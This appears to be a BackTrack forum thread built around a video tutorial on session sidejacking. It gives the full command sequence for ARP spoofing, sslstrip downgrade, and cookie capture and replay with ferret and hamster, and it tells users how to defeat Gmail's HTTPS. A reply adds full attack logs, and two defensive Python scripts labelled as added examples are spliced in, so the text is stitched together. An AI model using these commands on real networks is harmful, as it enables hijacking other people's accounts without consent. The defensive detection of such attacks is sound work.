Thread: [Video] Session Sidejacking (Ferret and Hamster)

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3288793
    Download video: http://www.mediafire.com/?3pz9w85jd4s328q
    What is this?
    This video demos how to do "Session Sidejacking". Sidejacking is where you clone your target's cookies, therefore you're "sharing" their identity for that account (without ever knowing the username or password)!


    What do I need?

    > arpspoof
    > sslstrip
    > Hamster (and Ferret)
    *all in BackTrack 4 Final*


    Software
    Name: arpspoof (DSniff)
    Version: 2.3
    Home Page: http://www.monkey.org/~dugsong/dsniff/
    Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

    Name: sslstrip
    Version: 0.6
    Home Page: http://www.thoughtcrime.org/software...rip/index.html
    Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

    Name: Hamster Sidejacking Tool
    Version: 2.0
    Home Page: http://hamster.erratasec.com/
    Download Link: http://hamster.erratasec.com/downloa...er-2.0.0.tar.z


    Commands:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -p -k -f
    
    /pentest/sniffers/hamster/ferret -i eth0
    
    /pentest/sniffers/hamster/hamster
    
    Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
    Konqueror -> http://hamster
    Notes:
    Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)
    Video length: 2:39
    Capture length: 3:42

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1877-%5Bvideo%5D-session-sidejacking-ferret-hamster.html
    Last edited by g0tmi1k; 03-05-2011 at 03:03 PM.
    Have you...g0tmi1k?
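
Seen from the defending side, the sidejacking described in the post above depends on session cookies crossing the network in cleartext, or on the connection being downgradable by sslstrip. The check below is an added example, not part of the original post or of any tool named in it; the URLs, header values and finding names are constructed for illustration.

```python
import re

def parse_set_cookie(value):
    """Return (cookie name, set of lowercase attribute names) for one Set-Cookie value."""
    first, *rest = [part.strip() for part in value.split(";")]
    attrs = {part.partition("=")[0].strip().lower() for part in rest if part}
    return first.partition("=")[0].strip(), attrs

def hsts_max_age(headers):
    """Seconds of HSTS protection the response asks for; 0 if absent or disabled."""
    for name, value in headers:
        if name.lower() == "strict-transport-security":
            m = re.search(r'max-age\s*=\s*"?(\d+)', value, re.I)
            return int(m.group(1)) if m else 0
    return 0

def audit(url, headers):
    """Return (finding, subject) pairs for one response; headers is a list of (name, value)."""
    https = url.lower().startswith("https://")
    findings = []
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        if not https:
            # The cookie was just handed out in cleartext, whatever its flags say.
            findings.append(("COOKIE_SET_OVER_HTTP", cookie))
        elif "secure" not in attrs:
            # Without Secure the browser also attaches it to plain-HTTP requests.
            findings.append(("COOKIE_NO_SECURE", cookie))
    # Browsers ignore HSTS received over plain HTTP, and max-age=0 clears the policy.
    if not https or hsts_max_age(headers) == 0:
        findings.append(("NO_EFFECTIVE_HSTS", url))
    return findings

# Constructed sample responses (not captured from any real site).
WEAK = [("Content-Type", "text/html"),
        ("Set-Cookie", "sessionid=3f9a; Path=/; HttpOnly"),
        ("Set-Cookie", "theme=dark; Path=/; Secure")]
HARDENED = [("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
            ("Set-Cookie", "sessionid=3f9a; Path=/; Secure; HttpOnly; SameSite=Lax")]

if __name__ == "__main__":
    for url, headers in [("https://app.example/login", WEAK),
                         ("https://app.example/login", HARDENED),
                         ("http://app.example/login", HARDENED)]:
        print(url, audit(url, headers))
```

The third case shows that correct headers do not help if the response itself is served over HTTP: the cookie has already been exposed and the HSTS header is ignored.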

  2. #2

    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    Big Sky Country
    Posts
    17

    Have you been able to do this against a victim logging into Facebook/MySpace? Just curious, as when I try it, it gives a ton of cookies, and none seem to work. Thanks

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    1

    What software do you use for creating the videos ?

  5. #5
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    4

    Thanks for sharing, great video, keep going.

  6. #6
    Just burned his ISO Bandito's Avatar
    Join Date
    Jan 2010
    Posts
    5

    I was able to successfully sidejack my Facebook account. However, I am having issues with sidejacking Gmail. The victim I used was an XP laptop. I tried to log in to Gmail on the XP machine; the Gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my Gmail to begin with.

    Any ideas? Is Gmail not allowing unencrypted logins now?

  7. #7
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Quote Originally Posted by freemymind View Post
    Great video, thank you for posting this. I am very interested in trying this out myself.

    Well done!
    Quote Originally Posted by Thunder-R View Post
    Thanks for sharing, great video, keep going.
    Thanks for the thanks


    Quote Originally Posted by A Student View Post
    Have you been able to do this against a victim logging into Facebook/MySpace? Just curious, as when I try it, it gives a ton of cookies, and none seem to work. Thanks
    Yep. Works for me. Try again?

    Quote Originally Posted by CyberGod View Post
    What software do you use for creating the videos ?
    Camtasia Studio


    Quote Originally Posted by Bandito View Post
    I was able to successfully sidejack my Facebook account. However, I am having issues with sidejacking Gmail. The victim I used was an XP laptop. I tried to log in to Gmail on the XP machine; the Gmail login URL was directed to an unsecured HTTP. In my attempts it just kept forcing me to re-authenticate and I would never get into my Gmail to begin with.

    Any ideas? Is Gmail not allowing unencrypted logins now?
    Try SSLStrip.
    Have you...g0tmi1k?

  8. #8
    Just burned his ISO
    Join Date
    May 2010
    Posts
    5

    g0tmi1k, any idea why I get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when I run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?

  9. #9
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Quote Originally Posted by kenv202 View Post
    g0tmi1k, any idea why I get the message "live(1): LLC:control: unparsed value: 0x4e (78)" when I run the cmd "/pentest/sniffers/hamster/ferret -i wlan0"?
    Nope.


    Could you change your setup so you can do a test over eth0 and see if it works that way?
    Using a Live CD of BackTrack? Installed? Updated BackTrack at all?
    Have you...g0tmi1k?

  10. #10
    Just burned his ISO
    Join Date
    May 2010
    Posts
    5

    Quote Originally Posted by g0tmi1k View Post
    Nope.


    Could you change your setup so you can do a test over eth0 and see if it works that way?
    Using a Live CD of BackTrack? Installed? Updated BackTrack at all?
    Hi, sorry for the late reply. I am using a persistent live CD of BT4 Final, and I have updated everything recently using the apt-get cmd.

    I fixed the LLC error by changing to my Alfa card rather than using my internal wireless card.

    here is my log:
    1st window:
    echo 1 > /proc/sys/net/ipv4/ip_forward

    root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34

    2nd window:
    root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    root@bt:~# sslstrip -p -k -f

    sslstrip 0.6 by Moxie Marlinspike running...

    3rd window: (this is where it starts going wrong, I think)
    -- Sniffing on interface "wlan1"
    SNIFFING: wlan1
    LINKTYPE: 1 Ethernet
    ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
    ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
    Traffic seen
    ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
    ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
    ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
    ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
    ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
    ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
    proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
    ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
    ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
    proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"

    4th window:

    root@bt:~# /pentest/sniffers/hamster/hamster
    --- HAMPSTER 2.0 side-jacking tool ---
    begining thread
    Set browser to use proxy BackTrack Linux
    DEBUG: set_ports_option(1234)
    DEBUG: mg_open_listening_port(1234)
    Proxy: listening on 127.0.0.1:1234
    GET /StreamReceiver/services
    GET /StreamReceiver/services HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
    Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
    Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
    Accept-Language: en
    Host: rcv-srv22.inplay.tubemogul.com
    Connection: close
    Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8

    recv failed: Connection reset by peer
    recv failed: Connection reset by peer

    I have no idea why it says recv failed: Connection reset by peer...

    Basically, once I got Hamster up and running, I proceeded to use my 2nd laptop, which runs Windows 7. I used Firefox to log into my Gmail account, then refreshed Konqueror on my BT4 machine, but didn't see the log for that computer in Konqueror.
    (Yes, both of my computers are connected to the same network.)

    Hope you can help =)
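
The repeated `arp reply ... is-at ...` lines in the first window of the log above are also what a defender on the same LAN can key on. The monitor below is an added example, not part of the thread or of any tool mentioned in it; the addresses, alert names and the `pinned` parameter are constructed for illustration.

```python
import re

ARP_REPLY = re.compile(
    r"reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ((?:[0-9a-f]{1,2}:){5}[0-9a-f]{1,2})", re.I)

def norm_mac(mac):
    """Zero-pad octets so 0:c0:ca:... and 00:c0:ca:... compare equal."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def watch(lines, pinned=None):
    """Return ordered, de-duplicated alerts for suspicious ARP replies.

    pinned: trusted ip -> mac bindings (e.g. the gateway) that are never relearned.
    """
    pinned = {ip: norm_mac(mac) for ip, mac in (pinned or {}).items()}
    learned = dict(pinned)   # ip -> mac currently believed
    owners = {}              # mac -> set of IPs it has claimed
    alerts = []

    def alert(*item):
        if item not in alerts:
            alerts.append(item)

    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group(1), norm_mac(m.group(2))
        known = learned.get(ip)
        if known and known != mac:
            alert("BINDING_CHANGED", ip, known, mac)
        if ip not in pinned:
            learned[ip] = mac
        owners.setdefault(mac, set()).add(ip)
        if len(owners[mac]) > 1:
            alert("MAC_CLAIMS_MULTIPLE_IPS", mac, tuple(sorted(owners[mac])))
    return alerts

# Constructed observations: a gateway, a host, then the host's MAC claiming the gateway IP.
SAMPLE = [
    "arp reply 10.0.0.1 is-at 02:00:00:00:00:01",
    "arp reply 10.0.0.23 is-at 02:00:00:00:00:23",
    "2:0:0:0:0:23 0:0:0:0:0:0 0806 42: arp reply 10.0.0.1 is-at 2:0:0:0:0:23",
    "2:0:0:0:0:23 0:0:0:0:0:0 0806 42: arp reply 10.0.0.1 is-at 2:0:0:0:0:23",
]

if __name__ == "__main__":
    for a in watch(SAMPLE, pinned={"10.0.0.1": "02:00:00:00:00:01"}):
        print(a)
```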
